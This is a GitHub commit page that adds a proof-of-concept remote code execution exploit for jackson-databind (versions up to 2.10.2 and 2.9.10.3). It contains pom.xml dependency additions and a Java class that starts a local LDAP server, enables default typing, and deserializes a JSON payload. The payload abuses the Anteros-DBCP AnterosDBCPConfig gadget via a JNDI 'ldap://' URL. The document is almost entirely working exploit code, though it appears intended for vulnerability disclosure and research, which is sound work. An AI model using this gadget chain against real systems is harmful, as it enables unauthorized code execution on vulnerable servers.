Skip to content

Commit 407396b

Browse files
author
threedr3am
committed
feat:jackson新gadget(anteros-dbcp)
1 parent a5839c5 commit 407396b

File tree

2 files changed

+68
-0
lines changed

2 files changed

+68
-0
lines changed

jackson/pom.xml

Lines changed: 19 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -79,6 +79,25 @@
7979
<artifactId>javaee-api</artifactId>
8080
<version>6.0</version>
8181
</dependency>
82+
83+
<!-- https://mvnrepository.com/artifact/com.codahale.metrics/metrics-healthchecks -->
84+
<dependency>
85+
<groupId>com.codahale.metrics</groupId>
86+
<artifactId>metrics-healthchecks</artifactId>
87+
<version>3.0.2</version>
88+
</dependency>
89+
<!-- https://mvnrepository.com/artifact/br.com.anteros/Anteros-Core -->
90+
<dependency>
91+
<groupId>br.com.anteros</groupId>
92+
<artifactId>Anteros-Core</artifactId>
93+
<version>1.2.1</version>
94+
</dependency>
95+
<!-- https://mvnrepository.com/artifact/br.com.anteros/Anteros-DBCP -->
96+
<dependency>
97+
<groupId>br.com.anteros</groupId>
98+
<artifactId>Anteros-DBCP</artifactId>
99+
<version>1.0.1</version>
100+
</dependency>
82101
</dependencies>
83102

84103
</project>

jackson/src/main/java/com/threedr3am/bug/jackson/AnterosPoc.java

Lines changed: 49 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,49 @@
1+
package com.threedr3am.bug.jackson;
2+
3+
import com.fasterxml.jackson.databind.ObjectMapper;
4+
import com.threedr3am.bug.common.server.LdapServer;
5+
import java.io.IOException;
6+
7+
/**
8+
*
9+
* jackson-databind <= 2.10.2 and <= 2.9.10.3 RCE,需要开启DefaultType (reported by threedr3am to the authorities)
10+
*
11+
* <dependency>
12+
* <groupId>com.codahale.metrics</groupId>
13+
* <artifactId>metrics-healthchecks</artifactId>
14+
* <version>3.0.2</version>
15+
* </dependency>
16+
*
17+
* <dependency>
18+
* <groupId>br.com.anteros</groupId>
19+
* <artifactId>Anteros-Core</artifactId>
20+
* <version>1.2.1</version>
21+
* </dependency>
22+
*
23+
* <dependency>
24+
* <groupId>br.com.anteros</groupId>
25+
* <artifactId>Anteros-DBCP</artifactId>
26+
* <version>1.0.1</version>
27+
* </dependency>
28+
*
29+
* @author threedr3am
30+
*/
31+
public class AnterosPoc {
32+
33+
static {
34+
//rmi server示例
35+
// RmiServer.run();
36+
37+
//ldap server示例
38+
LdapServer.run();
39+
}
40+
41+
public static void main(String[] args) throws IOException {
42+
ObjectMapper mapper = new ObjectMapper();
43+
mapper.enableDefaultTyping();
44+
45+
String json = "[\"br.com.anteros.dbcp.AnterosDBCPConfig\", {\"healthCheckRegistry\": \"ldap://localhost:43658/Calc\"}]";
46+
mapper.readValue(json, Object.class);
47+
}
48+
49+
}

0 commit comments

Comments
 (0)